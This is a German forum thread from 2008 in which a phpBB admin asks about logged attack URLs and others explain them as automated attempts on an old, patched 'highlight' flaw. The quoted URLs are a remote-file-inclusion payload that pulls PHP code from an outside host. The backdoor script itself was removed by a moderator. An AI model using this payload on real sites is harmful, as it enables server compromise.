Ich denke dass wahr ein Hackversuch

neuer · Beitrag von **neuer** » 01.05.2008 18:46

Vielleicht kann mir das mal jemand erklären und mir die ganze geschicht interpretieren.

also gefundene url im cback wahr:

Code: Alles auswählen

einmal so:
http://www.mein-forum.de//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://-censored-.biz/dur.haka??

und einmal so:

http://www.mein-forum.de/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://-censored-.biz/dur.haka??

und dann habe ich mal nachgeschaut was sich dahinter verbirgt und das wahr dann dass hier:

Code: Alles auswählen

--edit cYbercOsmOnauT-- Code eines Backdoorscripts gelöscht

Muss ich mir da sorgen machen ?
Was hat der Versucht zu machen?
jetzt habe ich noch ein anderes problem das laden der index dauert mit dem ff ewig lange und mit dem normalen explorer bekomm ich ne weiße seite, aber nicht immer nur manchmal ist das soo?

PS: sorry das der code den thread blääääät

Beitrag von **cYbercOsmOnauT** » 01.05.2008 20:16

1.) Ich hoffe im cback (dem Chris) hast Du den Code nicht gefunden.

2.) Sorgen musst Du Dir keine machen, denn wenn es geblockt wird, kommt es auch nicht durch.

Grüße,
Tekin

neuer · Beitrag von **neuer** » 03.05.2008 09:30

ok dank dir!!!

wäre es nicht eigentlich besser die bots schon mit der htaccess auszusperren????

Beitrag von **Boecki91** » 03.05.2008 09:52

Wenn ich das richtig sehe versuchte das Script, einen alten Fehler in der highlight auszunutzen, doch die Lücke wurde bereits bei einem updatet geschlossen, das zeigt mal wieder wie wichtig Updates sind.

Solche Angriffe laufen meist automatisiert ab und erzeugen somit immer ein Hintergrundrauschen, welchem fast jede Webseite ausgesetzt ist.

neuer · Beitrag von **neuer** » 03.05.2008 19:42

Boecki91 hat geschrieben:Wenn ich das richtig sehe versuchte das Script, einen alten Fehler in der highlight auszunutzen, doch die Lücke wurde bereits bei einem updatet geschlossen, das zeigt mal wieder wie wichtig Updates sind. Solche Angriffe laufen meist automatisiert ab und erzeugen somit immer ein Hintergrundrauschen, welchem fast jede Webseite ausgesetzt ist.

was meinst du mit dem hintergrundrauschen?????

aber du hast recht updates sind ungemein wichtig. will garnicht ohne denen leben hehe.

Beitrag von **Boecki91** » 04.05.2008 15:21

Diese Angriffe laufen automatisiert, das heißt ein Rechner sucht selbst (mit Google und Co) nach phpBB Foren, und ruft diese dann auf, um diese Anzugreifen, da diese Angriffsmethode aber auf einem altem Sicherheitsloch beruht, passiert deinem Forum gar nichts, und da solche "Angriffe" häufiger Vorkommen sagt man einfach "Hintergrundrauschen" dazu, ähnlich wie beim Radio, wenn man immer die richtige Frequenz benutzt hat man keine Probleme mit dem Hintergrundrauschen.